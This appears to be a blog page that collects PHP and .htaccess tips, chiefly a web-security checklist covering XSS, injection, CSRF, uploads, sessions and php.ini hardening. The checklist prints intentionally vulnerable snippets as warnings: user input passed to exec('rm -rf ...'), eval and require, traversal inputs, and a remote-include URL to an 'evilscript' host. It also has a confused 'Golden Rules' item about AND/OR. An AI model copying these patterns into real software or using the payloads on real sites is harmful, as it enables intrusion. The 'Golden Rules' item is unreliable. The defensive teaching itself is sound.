Showing posts with label htaccess. Show all posts

Securing AJAX Requests (How to prevent AJAX requests from another domain)

// 1. X-Requested-With is added by most JavaScript libraries (jQuery etc.). It only shows that
//    the request came from an XMLHttpRequest, not which site sent it.
if (isset($_SERVER['HTTP_X_REQUESTED_WITH']) && strtolower($_SERVER['HTTP_X_REQUESTED_WITH']) === 'xmlhttprequest') {

  // Do something

}

// 2. Exact match on the Referer header
if (isset($_SERVER['HTTP_REFERER']) && $_SERVER['HTTP_REFERER'] === "http://yourdomain/ajaxurl")
{

 // Request identified as an AJAX request from our own page

}

// 3. Substring match on the Referer header. strpos() returns 0 (which is falsy) when the
//    needle sits at the start of the string, so the result must be compared with !== false.
if (isset($_SERVER['HTTP_REFERER']) && strpos($_SERVER['HTTP_REFERER'], 'yourdomain.com') !== false) {

   // check request from same origin

}

/*
* In case of a form post, browsers send the Origin header.
*/

if (isset($_SERVER['HTTP_ORIGIN']) && $_SERVER['HTTP_ORIGIN'] === 'http://www.yourdomain.club') {
 // check origin
}
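The same check done with a parsed host comparison, as an added example that is not code from the original post. It assumes the allowed host names shown and treats Origin/Referer the way a defender should: parse, compare the host exactly, reject when absent.

```php
<?php
// Added example, not code from the original post: validate the Origin (or Referer) header by
// parsing it and comparing the host exactly. A substring check like strpos($ref, 'yourdomain.com')
// also matches unrelated hosts that merely contain that text. Allowed host names are assumptions.

function request_origin_host(array $server): ?string
{
    // Browsers send Origin on form posts and cross-site XHR; fall back to Referer otherwise.
    $candidate = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? '';
    if ($candidate === '') {
        return null;
    }
    $parts = parse_url($candidate);
    if ($parts === false || empty($parts['host'])) {
        return null;
    }
    return strtolower($parts['host']);
}

function is_same_origin_ajax(array $server, array $allowedHosts): bool
{
    // X-Requested-With only proves the call came from an XMLHttpRequest, not from which site,
    // so it is combined with the host check rather than used on its own.
    $isXhr = isset($server['HTTP_X_REQUESTED_WITH'])
        && strtolower($server['HTTP_X_REQUESTED_WITH']) === 'xmlhttprequest';
    $host = request_origin_host($server);
    // A missing or unparsable header is rejected rather than allowed: an unverifiable
    // request is treated the same as a foreign one.
    return $isXhr && $host !== null && in_array($host, $allowedHosts, true);
}

// Constructed sample requests (not real traffic)
$allowed = ['www.yourdomain.club', 'yourdomain.club'];
$ownSite = [
    'HTTP_X_REQUESTED_WITH' => 'XMLHttpRequest',
    'HTTP_ORIGIN'           => 'http://www.yourdomain.club',
];
$otherSite = [
    'HTTP_X_REQUESTED_WITH' => 'XMLHttpRequest',
    'HTTP_REFERER'          => 'http://yourdomain.club.example.net/page',  // contains the name, is not us
];
var_dump(is_same_origin_ajax($ownSite, $allowed), is_same_origin_ajax($otherSite, $allowed));

// In the real handler: these headers stop cross-site browser requests, but a non-browser
// client can set any header it likes, so state-changing actions still need a CSRF token.
if (!is_same_origin_ajax($_SERVER, $allowed)) {
    http_response_code(403);
    exit('Forbidden');
}
```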

Resolved: cURL error 60: SSL certificate: unable to get local issuer certificate

Working solution (assuming Windows with the XAMPP server; similar for other environments):

•   Download cacert.pem, the CA bundle extracted from the Mozilla trust store and published by the cURL project at https://curl.se/docs/caextract.html (a plain PEM text file).

•   Put it here:

C:\xampp\php\extras\ssl\cacert.pem

•   In your php.ini, put this line in this section:

;;;;;;;;;;;;;;;;;;;;
; php.ini Options  ;
;;;;;;;;;;;;;;;;;;;;

curl.cainfo = "C:\xampp\php\extras\ssl\cacert.pem"

•   Restart your web server (Apache).

Problem solved!
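The same fix applied from PHP code, as an added example that is not part of the original post. It assumes the bundle path above and a placeholder URL, and shows the setting that must stay on (peer verification) next to the one that actually fixes the error (the CA bundle path).

```php
<?php
// Added example, not code from the original post: the same fix applied per request with
// CURLOPT_CAINFO, next to the shortcut that also silences error 60 but should not be used.
// The bundle path and the URL are assumptions.
const CA_BUNDLE = 'C:\\xampp\\php\\extras\\ssl\\cacert.pem';

function https_get(string $url, string $caBundle = CA_BUNDLE): string
{
    $ch = curl_init($url);
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER => true,
        // Keep verification on. CURLOPT_SSL_VERIFYPEER => false also makes error 60 disappear,
        // but then any certificate presented by a man in the middle is accepted.
        CURLOPT_SSL_VERIFYPEER => true,
        CURLOPT_SSL_VERIFYHOST => 2,
        // Point cURL at a trusted CA bundle so the issuer chain can be verified.
        CURLOPT_CAINFO         => $caBundle,
    ]);
    $body = curl_exec($ch);
    if ($body === false) {
        $error = curl_error($ch);
        curl_close($ch);
        throw new RuntimeException('cURL failed: ' . $error);
    }
    curl_close($ch);
    return $body;
}

// Check that the php.ini setting was picked up by the running PHP before relying on it.
$ini = ini_get('curl.cainfo');
if ($ini === false || $ini === '' || !is_readable($ini)) {
    fwrite(STDERR, "curl.cainfo is unset or unreadable; pass the bundle path explicitly\n");
}

echo substr(https_get('https://example.com/'), 0, 200), "\n";
```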


Golden Rules of programming

1. The AND operator is used when we use (=) and the OR operator is used when we use (!=).
2. True ( || )     False ( && )

Your comments are welcome.

How to Secure PHP Web Applications and Prevent Attacks?

As a developer you must know how to build a secure and bulletproof application. Your duty is to prevent security attacks and secure your application.

Checklist of PHP and Web Security Issues

Make sure you have these items sorted out when deploying your application into production environment:
  1. ✔ Cross Site Scripting (XSS)
  2. ✔ Injections
  3. ✔ Cross Site Request Forgery (XSRF/CSRF)
  4. ✔ Public Files
  5. ✔ Passwords
  6. ✔ Uploading Files
  7. ✔ Session Hijacking
  8. ✔ Remote File Inclusion
  9. ✔ PHP Configuration
  10. ✔ Use HTTPS
  11. ✔ Things Not Listed

Cross Site Scripting (XSS)

An XSS attack happens when client-side code (usually JavaScript) gets injected into the output of your PHP script.
// GET data is sent through the URL: http://example.com/search.php?search=
$search = $_GET['search'] ?? null;
echo 'Search results for '.$search;

// This can be solved with htmlspecialchars
$search = htmlspecialchars($search, ENT_QUOTES, 'UTF-8');
echo 'Search results for '.$search;
  • ENT_QUOTES is used to escape single and double quotes besides HTML entities
  • UTF-8 is used for pre PHP 5.4 environments (now it is the default). In some browsers some characters might get past htmlspecialchars().
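Escaping for the three output contexts the search value can land in, as an added example that is not code from the original article. The search parameter is the article's; the helper names are assumptions.

```php
<?php
// Added example, not code from the original article: htmlspecialchars() is right for HTML
// text and quoted attributes, but a value placed inside a <script> block needs JSON encoding.
// The search parameter is the article's; the helper names are assumptions.
function e(string $s): string
{
    // ENT_SUBSTITUTE replaces invalid UTF-8 sequences instead of returning an empty string.
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function js($value): string
{
    // The HEX flags encode < > & ' " as \uXXXX, so the output can neither close the
    // <script> element nor break out of the string literal.
    return json_encode($value, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT);
}

$search = $_GET['search'] ?? '';

// HTML text context
echo 'Search results for ' . e($search);

// Attribute context: quote the attribute and escape the value
echo '<input type="text" name="search" value="' . e($search) . '">';

// JavaScript context: HTML entities are not decoded inside <script>, so e() would mangle the
// data, and it leaves newlines and backslashes alone, which break a JS string literal.
// json_encode() handles all of these.
echo '<script>var lastSearch = ' . js($search) . ';</script>';
```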

Injections

SQL Injection

When accessing databases from your application, SQL injection attack can happen by injecting malicious SQL parts into your existing SQL statement.

Directory Traversal (Path Injection)

Directory traversal attack is also known as ../ (dot, dot, slash) attack. It happens where user supplies input file names and can traverse to parent directory. Data can be set as index.php?page=../secret or /var/www/secret or something more catastrophic:
$page = $_GET['page'] ?? 'home';

require $page;
// or something like this
echo file_get_contents('../pages/'.$page.'.php');
In such cases you must check for attempts to access a parent directory or a remote location:
// Checking if the string contains parent directory
if (strstr($_GET['page'], '../') !== false) {
    throw new \Exception("Directory traversal attempt!");
}

// Checking remote file inclusions
if (strstr($_GET['page'], 'file://') !== false) {
    throw new \Exception("Remote file inclusion attempt!");
}

// Using whitelists of pages that are allowed to be included in the first place
$allowed = ['home', 'blog', 'gallery', 'catalog'];
$page = (in_array($page, $allowed)) ? $page : 'home';
echo file_get_contents('../pages/'.$page.'.php');

Command Injection

Be careful when dealing with command-executing functions and data you don’t trust. The following line hands user input straight to the shell:
exec('rm -rf '.$_GET['path']);

Code Injection

Code injection happens when malicious code can be injected in eval() function, so sanitize your data when using it:
eval('include '.$_GET['path']);
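The injection cases above handled the safe way, as one added example that is not code from the original article. It assumes a PDO connection, a pages directory next to the script and the ImageMagick convert command; the in-memory SQLite table at the end is constructed sample data.

```php
<?php
// Added example, not code from the original article: the three injection cases above, each
// handled by keeping user input as data instead of splicing it into SQL, a file path or a shell
// command. The database, the pages directory and the ImageMagick convert command are assumptions.

// SQL injection: the query text and the value travel separately, so a quote in $name is data.
function find_users(PDO $db, string $name): array
{
    $stmt = $db->prepare('SELECT id, name FROM users WHERE name = :name');
    $stmt->execute([':name' => $name]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Directory traversal: check the resolved path, not the raw string. This also rejects absolute
// paths and encoded variants that a strstr($page, '../') test never sees.
function page_path(string $page, string $baseDir = __DIR__ . '/pages'): string
{
    if (!preg_match('/^[a-z0-9_-]+$/i', $page)) {
        throw new InvalidArgumentException('Bad page name');
    }
    $base = realpath($baseDir);
    $real = realpath($baseDir . '/' . $page . '.php');
    if ($base === false || $real === false || strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException('Page not found');
    }
    return $real;
}

// Command injection: allowlist the name, then let escapeshellarg() make it a single quoted
// argument so that shell metacharacters in it cannot start a second command.
function make_thumbnail(string $file, string $dir = '/var/www/uploads'): string
{
    if (!preg_match('/^[a-z0-9_-]+\.(jpe?g|png)$/i', $file)) {
        throw new InvalidArgumentException('Bad file name');
    }
    $cmd = 'convert ' . escapeshellarg("$dir/$file") . ' -resize 200x200 '
         . escapeshellarg("$dir/thumbs/$file");
    exec($cmd, $output, $status);
    if ($status !== 0) {
        throw new RuntimeException("convert exited with status $status");
    }
    return "$dir/thumbs/$file";
}

// Usage with constructed data: an in-memory SQLite table stands in for the real database.
$db = new PDO('sqlite::memory:');
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)');
$db->prepare('INSERT INTO users (name) VALUES (:n)')->execute([':n' => "O'Brien"]);
print_r(find_users($db, "O'Brien"));   // the apostrophe never reaches the SQL parser as syntax
echo page_path('home'), "\n";          // throws unless pages/home.php exists below this script
```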

Cross Site Request Forgery (XSRF/CSRF)

Cross-site request forgery (also called a one-click attack or session riding) is an exploit where a user is made to execute unwanted actions on a web application.
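The standard countermeasure, a per-session synchronizer token, as an added example that is not code from the original article. The form field name and the action URL are assumptions.

```php
<?php
// Added example, not code from the original article: a synchronizer token, the usual
// countermeasure for CSRF. The form field name and the action URL are assumptions.
session_start();

function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        // 32 CSPRNG bytes, hex-encoded: unguessable and bound to this session
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

function csrf_check($submitted): bool
{
    if (empty($_SESSION['csrf_token']) || !is_string($submitted)) {
        return false;
    }
    // hash_equals() runs in constant time, so the comparison leaks nothing about the token
    return hash_equals($_SESSION['csrf_token'], $submitted);
}

if (($_SERVER['REQUEST_METHOD'] ?? 'GET') === 'POST') {
    // A forged cross-site request carries the victim's cookies automatically, but not this
    // token: the other site cannot read our page to copy it.
    if (!csrf_check($_POST['csrf_token'] ?? null)) {
        http_response_code(403);
        exit('Invalid CSRF token');
    }
    // ... perform the state-changing action here ...
}

// Every state-changing form carries the token; GET requests should never change state.
$token = htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8');
echo '<form method="post" action="/delete-account">'
   . '<input type="hidden" name="csrf_token" value="' . $token . '">'
   . '<button type="submit">Delete my account</button></form>';
```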

Public Files

Make sure to move all your application files, configuration files and similar parts of your web application into a folder that is not publicly accessible when you visit the URL of the web application. Some file types (for example .yml files) might not be processed by your web server, and a user can then view them online.
Example of a good folder structure:
app/
  config/
    parameters.yml
  src/
public/
  index.php
  style.css
  javascript.js
  logo.png
Configure the web server to serve files from the public folder instead of your application root folder. The public folder contains the front controller (index.php). In case the web server gets misconfigured and fails to serve PHP files properly, only the source code of index.php will be visible to the public.

Passwords

When working with users’ passwords, hash them properly with the password_hash() function.

Uploading Files

A lot of security breaches happen where users can upload a file to the server. Make sure you go through all the vulnerabilities of uploading files, such as renaming the uploaded file, moving it to a publicly inaccessible folder, checking the file type and similar. Since there are a lot of issues to check here, more information is located in the separate FAQ:
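The upload checks just listed, combined into one handler, as an added example that is not code from the original article. The storage directory, size limit, allowed types and form field name are assumptions.

```php
<?php
// Added example, not code from the original article: the upload checks the section lists
// (type check, server-chosen name, storage outside the public folder) in one handler.
// The directory, size limit and allowed types are assumptions.
const UPLOAD_DIR = '/var/www/app/uploads';   // outside public/, so nothing here is served as a script
const MAX_BYTES  = 2 * 1024 * 1024;
const ALLOWED    = ['image/jpeg' => 'jpg', 'image/png' => 'png'];
function store_upload(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('Upload failed with error code ' . ($file['error'] ?? 'none'));
    }
    if ($file['size'] > MAX_BYTES) {
        throw new RuntimeException('File too large');
    }
    // $file['type'] and $file['name'] both come from the browser; detect the type from the bytes.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($mime === false || !isset(ALLOWED[$mime])) {
        throw new RuntimeException('Unsupported file type');
    }
    // Random name with an extension we chose: no path separators, no double extensions, no collisions.
    $name = bin2hex(random_bytes(16)) . '.' . ALLOWED[$mime];
    $dest = UPLOAD_DIR . '/' . $name;
    // move_uploaded_file() refuses any source that is not a file uploaded in this request.
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('Could not store file');
    }
    chmod($dest, 0640);   // readable by the app, never executable
    return $name;
}

// Files are served through a script, never by exposing the directory in the web root.
function send_upload(string $name): void
{
    $path = UPLOAD_DIR . '/' . $name;
    if (!preg_match('/^[a-f0-9]{32}\.(jpg|png)$/', $name) || !is_file($path)) {
        http_response_code(404);
        exit;
    }
    header('Content-Type: ' . (new finfo(FILEINFO_MIME_TYPE))->file($path));
    header('X-Content-Type-Options: nosniff');   // browser must not second-guess the type
    header('Content-Disposition: inline; filename="' . $name . '"');
    readfile($path);
}

if (isset($_FILES['avatar'])) {
    echo 'Stored as ' . htmlspecialchars(store_upload($_FILES['avatar']), ENT_QUOTES, 'UTF-8');
} elseif (isset($_GET['file'])) {
    send_upload($_GET['file']);
}
```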

Session Hijacking

Session hijacking is an attack where an attacker steals the session ID of a user. The session ID is sent to the server, where the $_SESSION array gets populated based on it. Session hijacking is possible through an XSS attack or if someone gains access to the folder on the server where session data is stored.
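A login routine that ties the Passwords section to the session measures that limit hijacking, as an added example that is not code from the original article. The users table, its columns, the cookie parameters and the in-memory SQLite data at the end are assumptions and constructed sample data.

```php
<?php
// Added example, not code from the original article: a login that ties the Passwords section
// (password_hash / password_verify) to the session measures that limit hijacking. The users
// table, its columns and the cookie parameters are assumptions.
session_set_cookie_params([
    'httponly' => true,   // script cannot read the cookie, which blunts cookie theft via XSS
    'secure'   => true,   // sent over HTTPS only
    'samesite' => 'Lax',  // not attached to most cross-site requests
]);
session_start();

// Registration stores only the hash; PASSWORD_DEFAULT selects the currently recommended algorithm.
function make_password_hash(string $password): string
{
    return password_hash($password, PASSWORD_DEFAULT);
}

function login(PDO $db, string $username, string $password): bool
{
    $stmt = $db->prepare('SELECT id, password_hash FROM users WHERE username = :u');
    $stmt->execute([':u' => $username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);

    // Verify against a dummy hash when the user is unknown, so the response time does not
    // reveal which user names exist.
    static $dummy = null;
    $dummy ??= make_password_hash('placeholder');
    $ok = password_verify($password, $row['password_hash'] ?? $dummy);
    if (!$ok || $row === false) {
        return false;
    }
    // Upgrade hashes made with an older algorithm or cost while the plaintext is available.
    if (password_needs_rehash($row['password_hash'], PASSWORD_DEFAULT)) {
        $upd = $db->prepare('UPDATE users SET password_hash = :h WHERE id = :id');
        $upd->execute([':h' => make_password_hash($password), ':id' => $row['id']]);
    }
    // Fresh session ID on login, old session deleted: an ID captured or planted before
    // authentication no longer refers to the logged-in session.
    session_regenerate_id(true);
    $_SESSION['user_id'] = (int) $row['id'];
    return true;
}

// Usage with constructed data (an in-memory SQLite database standing in for the real one)
$db = new PDO('sqlite::memory:');
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT)');
$ins = $db->prepare('INSERT INTO users (username, password_hash) VALUES (:u, :h)');
$ins->execute([':u' => 'alice', ':h' => make_password_hash('correct horse battery staple')]);
var_dump(login($db, 'alice', 'correct horse battery staple'), login($db, 'alice', 'wrong'));
```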

Remote File Inclusion

A remote file inclusion (RFI) attack means that an attacker can include custom scripts:
$page = $_GET['page'] ?? 'home';

require $page . '.php';
In the above code $_GET can be set to a remote file: http://yourdomain.tld/index.php?page=http://example.com/evilscript
Make sure you disable this in your php.ini unless you know what you’re doing:
; Disable opening remote files with fopen(), file_get_contents() and similar functions
allow_url_fopen = off
; Disable including remote files with the include(), require() and include_once() functions.
; If allow_url_fopen above is disabled, allow_url_include is also disabled.
allow_url_include = off

PHP Configuration

Always keep your installed PHP version updated. You can use versionscan to check for possible vulnerabilities of your PHP version. Update open source libraries and applications and maintain the web server.
Here are some of the important settings from php.ini that you should check out. You can also use iniscan to scan your php.ini files for best security practices.

Error Reporting

In your production environment you must always turn off displaying errors on screen. If errors occur in your application and they are visible to the outside world, an attacker can get valuable data for attacking your application. Set the display_errors and log_errors directives in the php.ini file:
; Disable displaying errors to screen
display_errors = off
; Enable writing errors to server logs
log_errors = on

Exposing PHP Version

The PHP version is visible in the HTTP response headers. You might want to consider hiding the PHP version by turning off the expose_php directive, which prevents the web server from sending back the X-Powered-By header:
expose_php = off

Remote Files

In most cases it is important to disable access to remote files:
; disable opening remote files for fopen, fsockopen, file_get_contents and similar functions
allow_url_fopen = 0
; disable including remote files for require, include and similar functions
allow_url_include = 0

open_basedir

This setting defines one or more directories (subdirectories included) where PHP has access to read and write files. This includes file handling (fopen, file_get_contents) and also including files (include, require):
open_basedir = "/var/www/test/uploads"

Session Settings

  • session.use_cookies and session.use_only_cookies
    PHP is by default configured to store session data on the server and a tracking cookie on the client side (usually called PHPSESSID) with a unique ID for the session.
; in most cases you'll want to enable cookies for storing the session
session.use_cookies = 1
; disable changing the session id through the PHPSESSID parameter (e.g. foo.php?PHPSESSID=)
session.use_only_cookies = 1
session.use_trans_sid = 0
; reject any session ID from the user that doesn't exist on the server and create a new one
; instead (1 = strict mode on)
session.use_strict_mode = 1
  • session.cookie_httponly
    If the attacker somehow manages to inject JavaScript code for stealing the user’s current cookies (the document.cookie string), the HttpOnly cookie you’ve set won’t show up in the list.
session.cookie_httponly = 1
  • session.cookie_domain
    This sets the domain for which cookies apply. For wildcard domains you can use .example.com, or set this to the domain it should be applied to. By default it is not enabled, so it is highly recommended for you to enable it:
session.cookie_domain = example.com
  • session.cookie_secure
    For HTTPS sites this accepts only cookies sent over HTTPS. If you’re still not using HTTPS, you should consider it.
session.cookie_secure = 1

Use HTTPS

HTTPS is a protocol for secure communication over network. It is highly recommended that you enable it on all sites. Read more about HTTPS in the dedicated FAQ: How to Install SSL Certificate and Enable HTTPS.

What is Next?

Above we’ve introduced many security issues. Security, attacks and vulnerabilities are continuously evolving. Take time to check some good resources to learn more about security, and turn this checklist into a habit:

Remove PHP Extension from URL Using Htaccess URL Rewrite Rule

RewriteEngine On
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME}.php -f
RewriteRule ^(.*)$ $1.php [NC,L]

In the code above we have used a RewriteRule to remove the .php extension from every URL that satisfies the conditions: the request is not an existing file, but the same name with .php appended is.

SOAP-ERROR: Parsing WSDL: Couldn't load from

For some versions of PHP, the SoapClient does not send HTTP user-agent information. What PHP versions do you have on the server vs your local WAMP?
Try to set the user agent explicitly, using a stream context as follows:
try {
    $opts = array(
        'http' => array(
            'user_agent' => 'PHPSoapClient'
        )
    );

    $context = stream_context_create($opts);
    $client = new SoapClient('http://ec.europa.eu/taxation_customs/vies/checkVatService.wsdl',
                             array('stream_context' => $context,
                                   'cache_wsdl' => WSDL_CACHE_NONE));

    $result = $client->checkVat(array(
        'countryCode' => 'DK',
        'vatNumber' => '47458714'
    ));
    print_r($result);
} catch (Exception $e) {
    echo $e->getMessage();
}

If it still does not work, check the conditions below.

The combination of HTTP over IPv6 and a missing HTTP User-Agent string seems to give the web service problems.

To verify this, try the following on your Linux host:
curl -A '' -6 http://ec.europa.eu/taxation_customs/vies/checkVatService.wsdl
This IPv6 request fails.
curl -A 'cURL User Agent' -6 http://ec.europa.eu/taxation_customs/vies/checkVatService.wsdl
This IPv6 request succeeds.
curl -A '' -4 http://ec.europa.eu/taxation_customs/vies/checkVatService.wsdl
curl -A 'cURL User Agent' -4 http://ec.europa.eu/taxation_customs/vies/checkVatService.wsdl
Both of these IPv4 requests succeed.
Interesting case :) I guess your Linux host resolves ec.europa.eu to its IPv6 address, and that your version of SoapClient did not add a user agent string by default.

Using Basic access authentication HTTP Auth With PHP

How to set up your App in a way that the browser prompts for username/password.


Problem

You probably don't want the whole world to see your development in progress. So you want to restrict access to a fortunate few using HTTP (basic) auth. In the fortrabbit PHP/FPM infrastructure neither PHP_AUTH_USER nor PHP_AUTH_PW is available, but you can easily work around that.


Solution

To utilize HTTP (basic) auth, you need to add a directive to your .htaccess file that forwards the Authorization header as an environment variable. This variable then contains the base64-encoded authentication data, which you can decode into PHP_AUTH_USER and PHP_AUTH_PW.

Modify .htaccess file


RewriteCond %{HTTP:Authorization} .
RewriteRule .* - [E=REMOTE_USER:%{HTTP:Authorization}]


Decode auth header in PHP


// header was not provided
if (empty($_SERVER['REMOTE_USER'])) {
    header('WWW-Authenticate: Basic realm="My Realm"');
    header('HTTP/1.0 401 Unauthorized');
    echo 'Need auth!';
    exit;
}

// extract user and pw from the encoded auth data: strip the leading "Basic " (6 chars),
// split on the first colon only (the password itself may contain colons), and pad so
// a header without any colon still yields two elements instead of a notice
list($_SERVER['PHP_AUTH_USER'], $_SERVER['PHP_AUTH_PW']) = array_pad(explode(
    ':',
    base64_decode(substr($_SERVER['REMOTE_USER'], 6)),
    2
), 2, '');
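Verifying the decoded credentials, as an added example that is not code from the original post. The user name and the hash value are assumptions; the hash is produced once with password_hash() and kept in configuration.

```php
<?php
// Added example, not code from the original post: once PHP_AUTH_USER and PHP_AUTH_PW are
// populated as above, verify them. The user name and the hash are assumptions; the hash is
// generated once with password_hash() and kept in configuration, not in the code.
const AUTH_USER = 'staging';
const AUTH_HASH = '$2y$10$REPLACE_WITH_OUTPUT_OF_password_hash';   // placeholder value

function basic_auth_ok(?string $user, ?string $pass): bool
{
    if ($user === null || $pass === null) {
        return false;
    }
    // Constant-time compare for the user name, bcrypt verify for the password: neither
    // a string comparison short-circuit nor a response-time difference reveals a partial match.
    $userOk = hash_equals(AUTH_USER, $user);
    $passOk = password_verify($pass, AUTH_HASH);
    return $userOk && $passOk;
}

if (!basic_auth_ok($_SERVER['PHP_AUTH_USER'] ?? null, $_SERVER['PHP_AUTH_PW'] ?? null)) {
    header('WWW-Authenticate: Basic realm="My Realm"');
    http_response_code(401);
    exit('Need auth!');
}
```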


Quick WordPress Multisite (MU) Installation and Setup for Different Domains and Sites

WordPress Multisite (or Network) is one WordPress installation that enables hosting of multiple different websites and domain names.
WordPress Multisite uses the same WordPress base (including the themes and plugins), WordPress database, and wp-config.php configuration file for all sites in the network.
To install and use WP MU (Multisite), you would:
  1. Install WordPress on a base website and domain. This installation will provide for all your MU sites.
  2. Activate (turn on) Multisite / Network:
    1. Edit wp-config.php
      define( 'WP_ALLOW_MULTISITE', true );
    2. Go to Tools > Network Setup, select to use: sub-domains, and provide the asked “network” details (primary: domain, title, mail address). Install.
    3. Make sure the displayed wp-config.php and .htaccess changes are made (and if not made automatically, make edits manually).
  3. Install the “WordPress MU Domain Mapping” plugin to be able to use separate domain names for different sites (otherwise you’ll only be able to use sub-domains for sites, such as site1.example.com, site2.example.com, site3.example.com).
  4. In the website’s settings (or directly in the HTTP and SSL VirtualHost files), add your list of sub-domains and full domains to the ServerAlias field. Make sure redirects are turned off.
  5. If hosting (i.e., not local dev), you’ll need to make sure that you have proper DNS set up for:
    • Each site’s domain name with a “CNAME” record resolving to the base (primary) domain name.
    • Wildcard (*) on the base (primary) domain’s host (sub-domains) with an “A” record resolving to the server’s IP address.
    • And of course the base domain name resolved to the server’s IP address.
  6. Make sure to clear your Browser’s cookies and cache.